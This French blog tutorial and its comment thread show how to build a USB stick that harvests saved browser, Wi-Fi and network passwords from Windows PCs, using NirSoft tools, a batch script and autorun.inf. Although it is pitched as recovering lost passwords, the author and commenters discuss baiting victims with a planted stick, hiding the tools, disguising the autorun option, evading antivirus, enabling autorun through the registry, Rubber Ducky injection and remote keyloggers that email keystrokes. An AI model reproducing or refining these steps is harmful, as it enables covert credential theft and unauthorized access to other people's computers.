Dernière mise à jour : 21 août 2024
Aujourd'hui, nous allons voir comment créer une clé USB qui récupère les mots de passe d’un ordinateur. Cette clé USB s’exécute automatiquement et récupère la plupart des mots de passe stocker sur un ordinateur.
Il est vraiment très utile surtout quand on a perdu ses mots de passe.
Pour créer une clé USB rootkit, suivez les étapes ci-dessous:
Étape 1
Nous allons dans un premier temps télécharger quelque outils qui nous permettent de récupérer les mots de passe des applications les plus courantes. Toutes ces applications sont issues du site Nirsoft (http://www.nirsoft.net/).
Ensuite, nous allons placer tous les fichiers .exe sur notre clé USB.
Étape 2
Maintenant, il faut créer un fichier launch.bat qui va ouvrir automatiquement les programmes de récupération de mot de passe et il va stocker les résultats dans un fichier texte.
Pour cela, on doit créer un nouveau document texte avec bloc note ou autre et écrire le code ci-dessous.
start WebBrowserPassView.exe /stext dossier1/WebBrowserPassView.txt
start WirelessKeyView.exe /stext dossier1/WirelessKeyView.txt
start netpass.exe /stext dossier1/netpass.txt
Attention a bien vérifier que les noms des outils correspondent bien aux noms qui sont écrit dans le fichier launch.bat .
A cette étape, lorsque launch.bat sera exécuté, ces logs seront envoyé dans un dossier appelé dossier1. Il faut donc créer un nouveau dossier et le nommer dossier1.
Étape 3
Ensuite, nous allons créer le fichier autorun.inf. Le fichier autorun.inf est un fichier texte enregistré à la racine d'un périphérique de stockage (DVD, Clé USB, etc.) permettant d'automatiser le lancement de certains programmes lors de l'insertion d'un périphérique de stockage.
Lorsque vous insérez votre clé USB généralement une fenêtre apparaît en nous demandant ce que l’on désire faire !
Dans cette fenêtre, nous allons créé une nouvelle option qui nous permettra ( une fois qu'on a cliqué dessus ) de récupérer les mots de passes de l'ordinateur et de les stockés dans le dossier créé dans l’étape 2.
Pour réaliser ceci, ouvrez un nouveau document texte puis insérez le code suivant :
open=launch.bat
ACTION='Le nom de la nouvelle option'
Enfin, enregistrez le fichier autorun.inf.
Félicitation ! Votre clé USB rootkit est maintenant près à utiliser, il ne vous reste plus qu'à la tester.
Donc pour récupérer les mots de passe d'un ordinateur sous Windows 7 ou Windows 10, il faut cliquer manuellement sur le petit programme Launch.bat.
Bonjour, quand les fichiers s’ouvrent ils ne s’ouvrent pas en arrière plan y a t’il moyen de faire une commande d’ouverture en arrière plan ?
Essayez de lancer WebBrowserPassView uniquement.
Bonjour,
Dans la partie [ACTION: »le nom de la nouvelle option »], je ne sais pas quoi écrire.
Pourriez-vous m’aider s’il vous plait ?
Merci.
Bonjour
Petite question : Est t’il possible de compléter la technique décrite plus haut en fonction de plusieurs points :
– si l’on souhaite utiliser la méthode de baiting (la cible récupère la clef usb « oubliée » et la connecte sur sa machine), alors la cible en ouvrant la clef va voir les outils qui y sont et prend conscience de la supercherie.
– je me trompe peut etre, mais si la cible est sur mac, alors l’autorun ne fonctionne pas et il faut qu’il ouvre manuellement le fichier qui possède le rootkit ou le keylogger
– si l’on procède en remote (sans accès physique à la machine), alors il faut récuperer les informations collectées en remote aussi, la technique presentée peut elle incorporer un script ou autre qui envoi par mail le log contenant les informations collectées? (je débute encore je n’ai vraisemblablement pas encore toutes les connaissances et le vocabulaire adapté)
Merci d’avance!
preener ducky-flasher pour l’usbs plus UN payload scripted par ducky toolkit pour fair un fichier .bin qui sera au coeur de l’usb et vous retrouver la joi d’une injection qui fonctionne sur windows 10 comme a lepoque de windows xp les method change mais vous aure le meme resultat .sauf que la en 8 seconde a mon crono votre fichier est subtiliser bonne chance
tu peux etre un peu plus precis car je debute dans ce domaine et j’ai pas tout compris a la facon d’adapter ce tuto a windows 10 :/
Y’a un moyen de faire un preener ducky-flasher sans en achetez ?
D’abord c’est Rubber Ducky, en suite si tu veux en fabriquer une tu trouveras plusieurs tuto sur youpute , reste à avoir de bonnes connaissances en électronique.
A ma connaissance les payloads ne peuvent se lancer sans le pass admin, donc ça limite beaucoup son utilité.
Quand à l’autorun.inf Microsoft empêche son fonctionnement depuis win XP trop dangereux.( déja dit)
ne vous fatiguez pas avec ça, obligé de lancer le batch manuellement, mais sans pass admin, c’est mort.
La question est:
Comment se connecter en admin avec un bios inaccessible, c.a.d. impossible de booter avec une clef ou un CD, et des droits limités, c.a.d. pas d’accès à CMD ni regedit et l’impossibilité de lancer la moindre appli, ou script.
Le premier qui trouve, je paie une tournée générale!
Cela fonctionne-t-il si on insère cette clé USB sur mac?
Ton tutoriel est tout simplement génial, cependant comme j’ai vu dans les commentaires récurrents a ce sujet, je vais répéter:
Pourquoi la plupart des appli .exe lancer a travers le fichier launch.bat enregistre les données dans des fichiers .cfg et non des fichiers .txt ?
Merci d’avance de nous aider.
Et encore merci pour ce super tuto 🙂
Ce problème est apparu avec les dernières mises à jour des applications. Essayez de télécharger les versions 2.11 ou version ultérieure.
Bonjours, les .txt ne sont pas dans le dossier pour chrome et firefox… En fait il y à que WirelessPassView qui s’affiche!
Une solution?
Ce problème est apparu avec les dernières mises à jour des applications. Essayez de télécharger les versions 2.11 ou version ultérieure.
Bonjour, je suis débutant et j’ai suivi ce tuto, et je rencontre un problème, apres avoir téléchargé les fichiers et créé le launch.bat et le autorun.inf, quand je lance le launch.bat, il ouvre tout les programme puis crée sur la clé des fichiers .cfg pour chacun des programmes, que dois-je faire ? Merci
Ce problème est apparu avec les dernières mises à jour des applications. Essayez de télécharger les versions 2.11 ou version ultérieure.
Pour info toutes les nouvelles versions dispo sur nirsoft sont dépourvus des commandes de créations auto des fichiers text (ou tout autre format)
Le problème c’est que l’autorun ne passe plus! Désormais Windows les bloque de façon automatique pour ceux provenant d’une clé USB… Une idée?
Merci trés bon Tuto & merci a @Draytane pour la modif
Bonne continuation le site est super !!
bonjour et un immense merci pour ce tuto ! tout fonctionne tres bien mais je suis obligé de lancer le .bat par moi meme car la nouvelle option ne s’affiche pas… je suis sur Windows 8 cela a peut etre une incidence.. quelq’un peut-il m’éclairer svp ? merci !!
Moi j’ai tout réussi… En anglais? normal…
J’ai tous télécharger depuis des sites differents….
Bonsoir ! Perso, ça ne marche pas pour mailpv et pspv 🙁
Et je voulais savoir si cela fonctionne aussi sur marque et quel logiciel faut-il télécharger pour Safari ?
top, tres bon tuto 🙂 personellement j’ai préféré faire une ou deux retouches, pour commencé j’ai mis les exe dans un dossier nommé « temp » (pour plus de discrétion)
mais j’ai laissé le fichier ini et le bat à la racine.
Puis j’ai modifié le bat comme ceci :
« mkdir dossier
start temp/ChromePass.exe /stext dossier/chrome.txt
start temp/iepv.exe /stext dossier/iexplorer.txt
start temp/mailpv.exe /stext dossier/mail.txt
start temp/mspass.exe /stext dossier/mspass.txt
start temp/PasswordFox.exe /stext dossier/netpass.txt
start temp/pspv.exe /stext dossier/pspv.txt »
comme ça il crée le dossier lui même, je trouve cela plus pratique. mais j’ai dû me séparer des exe qui demandaient confirmations :,-(
Sans doute n’as tu pris que les fichiers de langue.
Bonjour, j’aimerais savoir, peut-on contourner le problème des anti-virus? C’est à dire que dès que j’insère ma clé usb, mon pc la détecte comme malveillante et supprime donc tout les fichiers qui lui paraissent infectés.
salut!
merci pour votre tuto ca ma vraiment aider je vous remercie.
j’ai une toute petite question peut être vous paraître idiote mais bon j prend le risque 🙂
« Le nom de la nouvelle option » il s’agit de quoi? qu’est ce que j dois marqué?
merci d’avance et bonne continuation vraiment super votre site.
Bonsoir Prestige,
Pour le nom de la nouvelle option; tu peux choisir ce que tu veux. Tu peux mettre par exemple « Ouvrir le dossier et afficher les fichiers »
salut!
merci pour votre tuto ca ma vraiment aider je vous remercie.
j’ai une toute petite question peut être vous paraître idiote mais bon j prend le risque 🙂
« Le nom de la nouvelle option » il s’agit de quoi? qu’est ce que j dois marqué?
merci d’avance et bonne continuation vraiment super votre site.
Salut, je suis de retour une autre fois. Désolé pour le dérangement mais le lien est toujours mort, il y a t’il un lien torrent ou un site pour l’avoir ? Merci de m’avoir répondu !
Ca marche parfaitement pour moi, peux tu vérifier encore une fois ? Sinon tu peux tjrs les telecharger sur le site origine: http://www.nirsoft.net/password_recovery_tools.html
effectivement sa fonctionne merci !
Salut, comme par hasard j’ai pommé tout le pack et j’aimerais le ravoir mais ton lien n’es plus valide il marche plus, si c’est possible de le remettre a nouveaux
j’ai essayer de le faire avec le tuto mais il me donne des erreurs. Merci de me répondre très vite. Vous m’avez parler aussi des remotes keylogger, j’aimerai en savoir plus et savoir qu’est ce que c’est.Merci d’avance et continuer comme ça. Ca déchire chaque jour, je lis vos article et celui la est mon préféré
répondez moi vite !
Bonsoir tristan, ravie de te revoir ! 🙂 tu as raison le lien du pack est mort, je l’ai changé par un autre, tu peux mnt télécharger tout le pack comme avant !
En ce qui concerne Remote keylogger, c’est un logiciel espion invisible pour surveiller tous les aspects de l’activité des utilisateurs. Il envoie à l’adresse email indiquée chaque frappe tapé dans un ordinateur et des capture d’écrans à intervalles réguliers…
‘ Dans l’arborescence de la base de registre aller dans : [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer], modifier la clé suivante, avec la valeur 91 « NoDriveTypeAutoRun »=dword:00000091 enfin redémarre ton PC.’ Peut on faire cette modification pour chaque pc à qui on connecte la clé usb ??
Salut c’était pour savoir pourquoi quand j’exécute le launch.bat manuellement j’ai
« ERROR 5 : Accés refusé »?
Et aussi savoir pk l’autorun ne propose « le nom de la nouvelle option » dans le panneau qui s’affiche quand on met la clé usb?
merci bcp et j’adore tes tutos mec!
Pour voir le nom s’afficher tu dois autoriser l’exécution automatique de l’autorun.
Pour activer l’autorun, Menu Démarrer -> Exécuter -> regedit.exe
Tu cherche :[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer]
et tu modifie la valeur de la clé en 91
« NoDriveTypeAutoRun »=dword:00000091
Oui biensur, c’est le meme principe ! 🙂
Salut tristan,
Il n’est pas possible d’envoyer automatiquement ce fichier par mai. Le batch est très limité à l’ensemble des commandes disponible dans cmd.exe par contre il existe des remotes keylogger qui vous permettent de faire ça !
salut elahmed jaimerai en savoir plus de se que vous avez dit a propos qu’ il existe des remotes keylogger merci de me repondre vite et bonne journee
Bjr,
Autre chose,
Quand j’essaye, sur win 7 mêm apres que j’ai modifié le clé de registre, j’obtiens la fenêtre d’exécution automatique qui permet de choisir le type d’applications,
donc le script ne s’éxecute pas automatiquement !!!
Salam Ahmed,
La plupart des outils sont détectés comme Trojan/Virus (Faux alertes)
La question est comment peut on contourner l’antivirus pour ne pas les détecter !!!
parceque sinon, sa n’a pas d’importance la fonction d’automatiser les lancement.
Merci pour le tuto ^^.
A.M@
Poy Ahmed,
Un grand merci à toi !
Le script « %random% » fonctionne très bien.
J’ai mis à jour via nirsoft.net et effectivement le mien n’était pas à jour.
Continue de publier tes articles, je les dévore à chaque fois =)
Hi Jerzey,
Le premier problème, c’est a cause de l’autorun. Sur certain ordinateur l’autorun est désactivé. Pour activer l’autorun, aller dans Menu Démarrer → Exécuter → (taper regedit.exe)
Dans l’arborescence de la base de registre aller dans : [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer], modifier la clé suivante, avec la valeur 91 « NoDriveTypeAutoRun »=dword:00000091 enfin redémarre ton PC.
– Pour le deuxième problème, essaie de télécharger la dernier version du PasswordFox sur http://www.nirsoft.net/utils/passwordfox.html
– Enfin, pour éviter l’écrasement des anciens fichiers, on peut ajouter la commande « %random% » au fichier lunch.bat:
start mspass.exe /stext Mdp/mspass%random%.txt
Salut !
J’ai crée ce rootkit très sympa.
Cependant voici mes observations et problèmes rencontrés (en espérant que tu puisses les résoudre) :
– L’autorun + .bat sont bien implanté sur mon usb, cependant ils ne se lancent pas tout seul quand l’usb est inséré, il faut que l’user du PC, de manière voulue, clique sur l’icône launch.
– Le soft pour Firefox ne fonctionne cependant pas. J’ai toujours un message d’erreur sur tous les pc utilisé.
– Y aurait-il possibilité d’ajouter quelques lignes de code afin que le script crée un nouveau fichier texte nommé par exemple : MDP1 MDP2 etc etc plutôt que d’écraser à chaque fois l’ancien ? (Je ne connais pas la prog, néanmoins je pourrais chercher à faire ça, j’ai déjà fait pas mal de .bat mais je dois jouer avec les livres de commande :))